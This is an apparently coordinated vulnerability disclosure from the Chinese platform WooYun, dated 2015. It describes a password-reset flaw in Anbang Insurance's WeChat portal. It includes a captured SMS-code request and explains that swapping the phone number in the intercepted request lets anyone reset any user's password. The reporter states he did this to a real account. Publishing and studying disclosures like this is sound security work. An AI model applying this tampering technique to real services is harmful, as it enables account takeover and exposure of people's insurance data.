当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141895

漏洞标题:安邦保险集团某处漏洞可重置任意用户密码或将泄漏保单信息(以张伟测试)

相关厂商:安邦保险集团

漏洞作者: Martial

提交时间:2015-09-18 09:08

修复时间:2015-11-02 09:36

公开时间:2015-11-02 09:36

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-18: 细节已通知厂商并且等待厂商处理中
2015-09-18: 厂商已经确认,细节仅向厂商公开
2015-09-28: 细节向核心白帽子及相关领域专家公开
2015-10-08: 细节向普通白帽子公开
2015-10-18: 细节向实习白帽子公开
2015-11-02: 细节向公众公开

简要描述:

重置任意用户密码

详细说明:

问题出在微信端 安邦保险的找回密码处
我们以张伟为例
输入以后 点击获取验证码 抓包

POST /sso/before_toolkit/verificationCodeGeneratorAction?method=SendSMSVerificationCode HTTP/1.1
Host: y.abic.cn:8085
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12H143 MicroMessenger/6.2.4 NetType/3G+ Language/zh_CN
X-Requested-With: XMLHttpRequest
Accept: text/html, */*; q=0.01
Referer: http://y.abic.cn:8085/sso/webservice/sn/protable/mobileSecurityWebServiceAction.do?method=AutoLoginInitPage&platformId=PolicyEnquirySystem&sn=e3c3e8990dec4780bbb7fabfabf2e47f&hashcode=70b986a31ad7ec7435edbba9b6dbf903&backUrl=http%3A%2F%2Fy.abic.cn%2Far-weixin%2Fexternal%2FcheckUserAct%21oauth.do%3Ffrom%3Dbangft2015%26entity.wxAccount%3Do8G3vjstJvVUExBEGlDzVsIyw5Y4%26entity.operatingId%3D1DF89ECCAFDEC87DE050020AB0011CBD%26time%3D6f137456-a512-4060-8ec4-b128ef8d836e
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: keep-alive
Cookie: sso-johnhao-cookie3=e984befc2b4412afdf9d91c46dff94c1||7c0f7a2856a4f709a8a1fa778b94df7d; JSESSIONID-SSO=yb0BV7hJXLL12vD2wNWC742DTXfKwpQlVJSZ0y8xhnLV2LvMRZT7!508459608
Content-Length: 48
Origin: http://y.abic.cn:8085
Accept-Encoding: gzip, deflate
mobileNo=1377***7153&functionType=ForgetPassword


然后改包 把手机号改为我们自己的
然后收到验证码

3.jpg


输入验证码 跳转到修改密码处

1.jpg


我把密码改为了1234567 希望官方给张伟回复下

2.jpg

漏洞证明:

2.jpg

修复方案:

完善逻辑

版权声明:转载请注明来源 Martial@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-09-18 09:35

厂商回复:

谢谢,与上面问题类似,正正在整改中

最新状态:

暂无